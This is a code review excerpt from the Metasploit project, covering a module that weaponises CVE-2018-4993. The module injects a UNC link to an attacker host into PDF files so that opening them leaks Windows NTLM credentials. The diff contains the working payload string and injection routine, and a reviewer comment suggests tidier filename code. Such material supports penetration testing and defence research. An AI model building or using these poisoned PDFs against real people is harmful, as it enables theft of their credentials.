modules/auxiliary/fileformat/badpdf.rb

```diff
@@ -0,0 +1,164 @@
+        },
+        'License'       => MSF_LICENSE,
+        'Author'        =>
+            [
+              'Assaf Baharav',    # Code provided as POC by CheckPoint
+              'Yaron Fruchtmann', # Code provided as POC by CheckPoint
+              'Ido Solomon',      # Code provided as POC by CheckPoint
+              'Richard Davy - secureyourit.co.uk',  # Metasploit
+            ],
+        'Platform'      => [ 'win' ],
+        'References'    =>
+        [
+          ['CVE', '2018-4993'],
+          ['URL', 'https://research.checkpoint.com/ntlm-credentials-theft-via-pdf-files/']
+        ]
+
+      ))
+    register_options(
+      [
+        OptAddress.new("LHOST", [ true, "Host listening for incoming SMB/WebDAV traffic", nil]),
+        OptString.new("FILENAME", [ false, "Filename"]),
+        OptPath.new("PDFINJECT", [ false, "Path and filename to existing PDF to inject UNC link code into"]),
+
+      ])
+  end
+
+  def run
+    if !datastore['PDFINJECT'].nil? && datastore['PDFINJECT'].to_s.end_with?('.pdf')
+        injectpdf
+    else
+        if !datastore['FILENAME'].nil? && datastore['FILENAME'].to_s.end_with?('.pdf')
+          createpdf
+        else
+          print_error "FILENAME is empty, please enter FILENAME and rerun module"
+        end
+    end
+  end
+
+  def injectpdf
+    #Payload which gets injected
+    inject_payload = "/AA <</O <</F (\\\\\\\\#{datastore['LHOST']}\\\\test)/D [ 0 /Fit]/S /GoToE>>>>"
+
+    unless File.exists?(datastore['PDFINJECT'])
+      #If file not found display error message
+      print_error "File doesn't exist #{datastore['PDFINJECT']}"
+      return
+    end
+
+    #Read in contents of file
+    content = File.read(datastore['PDFINJECT'])
+
+    #Check for place holder - below ..should.. cover most scenarios.
+    if content.index("/Contents 2 0 R") != nil
+      #If place holder exists create new file content
+      newdata = content[0..(content.index('/Contents 2 0 R')+14)]+inject_payload+content[(content.index('/Contents 2 0 R')+15)..-1]
+    elsif content.index("/Contents 4 0 R") != nil
+      #If place holder exists create new file content
+      newdata = content[0..(content.index('/Contents 4 0 R')+14)]+inject_payload+content[(content.index('/Contents 4 0 R')+15)..-1]
+    elsif content.index("/Contents 6 0 R") != nil
+      #If place holder exists create new file content
+      newdata = content[0..(content.index('/Contents 6 0 R')+14)]+inject_payload+content[(content.index('/Contents 6 0 R')+15)..-1]
+    elsif content.index("/Contents 8 0 R") != nil
+      #If place holder exists create new file content
+      newdata = content[0..(content.index('/Contents 8 0 R')+14)]+inject_payload+content[(content.index('/Contents 8 0 R')+15)..-1]
+    end
+
+    if newdata.nil?
+      print_error "Could not find placeholder to poison file this time...."
+      return
+    end
+
+    newfilename = datastore['PDFINJECT'][(0..(datastore['PDFINJECT'].length-5))]+"_malicious.pdf"
```

Comment:
I'm not sure what you're doing here. It looks like you're stripping the '.pdf' file extension, then appending `_malicious.pdf`

This line is kind of a mess to read. You can use `0..-5` notation here or `gsub` :

```ruby
    newfilename = "#{datastore['PDFINJECT'].gsub(/\.pdf$/, '')}_malicious.pdf"
```

Reply:
done